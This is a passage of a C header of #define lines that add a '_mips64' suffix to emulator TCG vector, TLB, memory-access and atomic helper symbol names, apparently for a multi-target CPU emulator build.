tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mips64 #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mips64 #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mips64 #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mips64 #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mips64 #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mips64 #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mips64 #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mips64 #define vec_gen_2 vec_gen_2_mips64 #define vec_gen_3 vec_gen_3_mips64 #define vec_gen_4 vec_gen_4_mips64 #define tcg_gen_mov_vec tcg_gen_mov_vec_mips64 #define tcg_const_zeros_vec tcg_const_zeros_vec_mips64 #define tcg_const_ones_vec tcg_const_ones_vec_mips64 #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mips64 #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mips64 #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mips64 #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mips64 #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mips64 #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mips64 #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mips64 #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mips64 #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mips64 #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mips64 #define tcg_gen_ld_vec tcg_gen_ld_vec_mips64 #define tcg_gen_st_vec tcg_gen_st_vec_mips64 #define tcg_gen_stl_vec tcg_gen_stl_vec_mips64 #define tcg_gen_and_vec tcg_gen_and_vec_mips64 #define tcg_gen_or_vec tcg_gen_or_vec_mips64 #define tcg_gen_xor_vec tcg_gen_xor_vec_mips64 #define tcg_gen_andc_vec tcg_gen_andc_vec_mips64 #define tcg_gen_orc_vec tcg_gen_orc_vec_mips64 #define tcg_gen_nand_vec tcg_gen_nand_vec_mips64 #define tcg_gen_nor_vec tcg_gen_nor_vec_mips64 #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mips64 #define tcg_gen_not_vec tcg_gen_not_vec_mips64 #define tcg_gen_neg_vec tcg_gen_neg_vec_mips64 #define tcg_gen_abs_vec tcg_gen_abs_vec_mips64 #define tcg_gen_shli_vec tcg_gen_shli_vec_mips64 #define tcg_gen_shri_vec tcg_gen_shri_vec_mips64 #define tcg_gen_sari_vec tcg_gen_sari_vec_mips64 #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mips64 #define tcg_gen_add_vec tcg_gen_add_vec_mips64 #define tcg_gen_sub_vec tcg_gen_sub_vec_mips64 #define tcg_gen_mul_vec tcg_gen_mul_vec_mips64 #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mips64 #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mips64 #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mips64 #define tcg_gen_ussub_vec tcg_gen_ussub_vec_mips64 #define tcg_gen_smin_vec tcg_gen_smin_vec_mips64 #define tcg_gen_umin_vec tcg_gen_umin_vec_mips64 #define tcg_gen_smax_vec tcg_gen_smax_vec_mips64 #define tcg_gen_umax_vec tcg_gen_umax_vec_mips64 #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips64 #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips64 #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips64 #define tcg_gen_shls_vec tcg_gen_shls_vec_mips64 #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips64 #define tcg_gen_sars_vec tcg_gen_sars_vec_mips64 #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips64 #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips64 #define tb_htable_lookup tb_htable_lookup_mips64 #define tb_set_jmp_target tb_set_jmp_target_mips64 #define cpu_exec cpu_exec_mips64 #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips64 #define cpu_reloading_memory_map cpu_reloading_memory_map_mips64 #define cpu_loop_exit cpu_loop_exit_mips64 #define cpu_loop_exit_restore cpu_loop_exit_restore_mips64 #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips64 #define tlb_init tlb_init_mips64 #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips64 #define tlb_flush tlb_flush_mips64 #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips64 #define tlb_flush_all_cpus tlb_flush_all_cpus_mips64 #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips64 #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips64 #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mips64 #define tlb_flush_page tlb_flush_page_mips64 #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips64 #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips64 #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips64 #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips64 #define tlb_protect_code tlb_protect_code_mips64 #define tlb_unprotect_code tlb_unprotect_code_mips64 #define tlb_reset_dirty tlb_reset_dirty_mips64 #define tlb_set_dirty tlb_set_dirty_mips64 #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips64 #define tlb_set_page tlb_set_page_mips64 #define get_page_addr_code_hostp get_page_addr_code_hostp_mips64 #define get_page_addr_code get_page_addr_code_mips64 #define probe_access probe_access_mips64 #define tlb_vaddr_to_host tlb_vaddr_to_host_mips64 #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64 #define helper_le_lduw_mmu helper_le_lduw_mmu_mips64 #define helper_be_lduw_mmu helper_be_lduw_mmu_mips64 #define helper_le_ldul_mmu helper_le_ldul_mmu_mips64 #define helper_be_ldul_mmu helper_be_ldul_mmu_mips64 #define helper_le_ldq_mmu helper_le_ldq_mmu_mips64 #define helper_be_ldq_mmu helper_be_ldq_mmu_mips64 #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64 #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64 #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64 #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64 #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64 #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips64 #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips64 #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips64 #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips64 #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips64 #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips64 #define cpu_ldub_data_ra cpu_ldub_data_ra_mips64 #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips64 #define cpu_lduw_data_ra cpu_lduw_data_ra_mips64 #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips64 #define cpu_ldl_data_ra cpu_ldl_data_ra_mips64 #define cpu_ldq_data_ra cpu_ldq_data_ra_mips64 #define cpu_ldub_data cpu_ldub_data_mips64 #define cpu_ldsb_data cpu_ldsb_data_mips64 #define cpu_lduw_data cpu_lduw_data_mips64 #define cpu_ldsw_data cpu_ldsw_data_mips64 #define cpu_ldl_data cpu_ldl_data_mips64 #define cpu_ldq_data cpu_ldq_data_mips64 #define helper_ret_stb_mmu helper_ret_stb_mmu_mips64 #define helper_le_stw_mmu helper_le_stw_mmu_mips64 #define helper_be_stw_mmu helper_be_stw_mmu_mips64 #define helper_le_stl_mmu helper_le_stl_mmu_mips64 #define helper_be_stl_mmu helper_be_stl_mmu_mips64 #define helper_le_stq_mmu helper_le_stq_mmu_mips64 #define helper_be_stq_mmu helper_be_stq_mmu_mips64 #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips64 #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips64 #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips64 #define cpu_stb_data_ra cpu_stb_data_ra_mips64 #define cpu_stw_data_ra cpu_stw_data_ra_mips64 #define cpu_stl_data_ra cpu_stl_data_ra_mips64 #define cpu_stq_data_ra cpu_stq_data_ra_mips64 #define cpu_stb_data cpu_stb_data_mips64 #define cpu_stw_data cpu_stw_data_mips64 #define cpu_stl_data cpu_stl_data_mips64 #define cpu_stq_data cpu_stq_data_mips64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mips64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mips64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mips64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips64 #define helper_atomic_xchgb helper_atomic_xchgb_mips64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mips64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mips64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mips64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mips64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mips64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mips64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mips64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mips64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips64 #define cpu_ldub_code cpu_ldub_code_mips64 #define cpu_lduw_code cpu_lduw_code_mips64 